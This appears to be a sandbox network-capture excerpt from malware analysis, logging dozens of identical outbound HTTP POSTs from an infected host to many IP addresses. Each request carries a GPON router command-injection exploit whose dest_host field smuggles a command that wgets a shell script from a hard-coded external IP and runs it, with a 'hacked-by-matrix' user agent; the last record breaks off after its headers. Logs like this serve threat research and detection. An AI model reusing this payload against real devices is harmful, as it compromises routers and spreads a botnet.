                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1223192.168.2.133879042.46.47.9443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714180946 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1224192.168.2.1359792212.71.166.204443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714184046 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1225192.168.2.133813842.115.113.244443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714210033 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1226192.168.2.135176242.81.70.72443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714232922 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1227192.168.2.1356150212.130.163.4443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714250088 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1228192.168.2.1350776118.231.47.193443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714277029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1229192.168.2.135248042.103.75.78443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714335918 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1230192.168.2.1342536118.240.177.16443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714337111 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1231192.168.2.13328705.174.163.127443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714358091 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1232192.168.2.133332242.174.218.117443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714364052 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1233192.168.2.1336714212.33.181.81443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714395046 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1234192.168.2.13559365.255.0.189443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714411020 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1235192.168.2.1355038109.251.228.253443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714440107 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1236192.168.2.1349640109.200.36.49443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714478016 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1237192.168.2.1343354109.193.177.34443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714497089 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1238192.168.2.133448842.74.221.174443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714525938 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1239192.168.2.13399285.41.172.66443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714534044 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1240192.168.2.133327442.96.137.124443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714607000 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1241192.168.2.1352758109.247.237.24443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714646101 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1242192.168.2.1349564109.9.138.29443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714657068 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1243192.168.2.1336666118.188.56.130443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714728117 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1244192.168.2.13601045.27.60.92443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714735031 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1245192.168.2.1346830118.138.58.10443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714780092 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
